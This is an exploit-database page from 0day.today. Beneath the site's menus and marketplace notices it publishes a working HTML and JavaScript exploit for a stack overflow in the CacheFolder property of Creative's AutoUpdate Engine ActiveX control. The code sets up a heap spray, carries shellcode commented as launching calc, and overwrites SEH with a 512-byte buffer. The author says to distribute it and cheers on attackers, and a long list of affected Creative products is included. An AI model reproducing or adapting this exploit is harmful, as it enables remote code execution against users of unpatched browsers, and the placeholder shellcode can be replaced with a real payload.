0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Creative Software AutoUpdate Engine ActiveX Stack Overflow Exploit
[==================================================================
Creative Software AutoUpdate Engine ActiveX Stack Overflow Exploit
==================================================================
<html>
<!--
!!!NOT PRIVATE PLEASE DISTRIBUTE!!!
Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit by BitKrush <BitKrush +A.T.+ G.M.A.I.L.D.0.T.C.0.M.>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably.
Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security
ActiveX Download @ http://www.creative.com/su/Product.asp
MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION
Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tested On Windows XP SP3 with all patches (like that matters)
Products Affected:
the below Creative Labs Software and Hardware depends on this ActiveX for updates and comes shipped with it or is supported by the control:
Sound cards
Audigy
Audigy 2
Audigy 2 LS
Audigy 2 NX
Audigy 2 Platinum
Audigy 2 Platinum eX
Audigy 2 Value
Audigy 2 ZS
Audigy 2 ZS Gamer
Audigy 2 ZS Notebook
Audigy 2 ZS Platinum
Audigy 2 ZS Platinum Pro
Audigy 2 ZS Video Editor
Audigy 4 Pro
Audigy Gamer
Audigy LS
Audigy MP3+
Audigy Platinum
Audigy Platinum eX
Live! 24-bit
Live! 24-bit External
Live! 5.1
Live! 5.1 Digital (Dell)
Live! ADVANCED MB
MP3 +
Sound Blaster Audigy 2 ZS Digital Audio
Sound Blaster Audigy ADVANCED MB
Sound Blaster X-Fi Fatal1ty
Wireless Music
X-Fi Elite Pro
X-Fi Platinum
X-Fi XtremeMusic
USB Sound Blaster
Audigy 2 NX
MP3 +
Portable Audio
MuVo
MuVo NX
MuVo Slim
MuVo TX
MuVo TX FM
MuVo? X-Trainer
MuVo?
MuVo? FM
NOMAD II 32MB
NOMAD II MG
NOMAD IIc
NOMAD Jukebox 3
NOMAD Jukebox ZEN
Rhomba
Portable Media Players
ZEN Portable Media Center
ZEN Vision 30GB
MP3 Players
MuVo
MuVo 2.0 / MuVo Mix
MuVo Micro
MuVo NX
MuVo Slim
MuVo Sport C100
MuVo TX
MuVo TX FM
MuVo V200
MuVo? X-Trainer
MuVo?
MuVo? FM
NOMAD II 32MB
NOMAD II MG
NOMAD II MG Limited Edition
NOMAD IIc
NOMAD JukeBox
NOMAD Jukebox 10GB
NOMAD Jukebox 2
NOMAD Jukebox 3
NOMAD Jukebox C
NOMAD Jukebox ZEN
NOMAD Jukebox ZEN NX
NOMAD Jukebox ZEN USB 2.0
Rhomba
ZEN 20GB
ZEN Micro
ZEN Nano 512MB
ZEN Nano Plus
ZEN Neeon 5GB/6GB
ZEN Portable Media Center
ZEN Sleek
ZEN Touch
ZEN Vision 30GB
ZEN Xtra
Web Cameras
Creative PC-CAM 900
Creative WebCam Vista
Game Star
Live! Ultra for Notebooks
PC-CAM 880
WebCam Instant
WebCam Instant
WebCam Live!
WebCam Live! Pro
WebCam Live! Ultra
WebCam Notebook
WebCam NX
WebCam NX Pro
WebCam NX Ultra
WebCam Vista
Video
Audigy 2 ZS Video Editor
Wireless
Wireless Music
Notebook Products
Audigy 2 NX
Audigy 2 ZS Notebook
Live! 24-bit External
Live! Ultra for Notebooks
MP3 +
WebCam Notebook
Software
Game Star
http://us.creative.com/support/downloads/popup_supportproducts.asp
Google: http://www.google.com/search?q=0A5FD7C5-A45C-49FC-ADB5-9952547D5715&btnG=Search
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ActiveX CLSID = 0A5FD7C5-A45C-49FC-ADB5-9952547D5715
KILL BIT THIS ^^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-->
<object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object>
<script language='javascript'>
var sc01 = unescape("%u9090%u9090"+ //Windows Execute Command (calc)
"%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c");
var mainblk = unescape("%u0c0c%u0c0c");
var hdr = 20;
var slck = hdr + sc01.length;
while (mainblk.length < slck) mainblk += mainblk;
var fillblk = mainblk.substring(0,slck);
var blk = mainblk.substring(0,mainblk.length - slck);
while (blk.length + slck < 0x40000) blk = blk + blk + fillblk;
var memory = new Array();
for (i = 0; i < 400; i++){ memory[i] = blk + sc01 }
var buf = '';
while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here.
obj1.cachefolder = buf;
</script>
</html>
# 0day.today [2024-11-16] #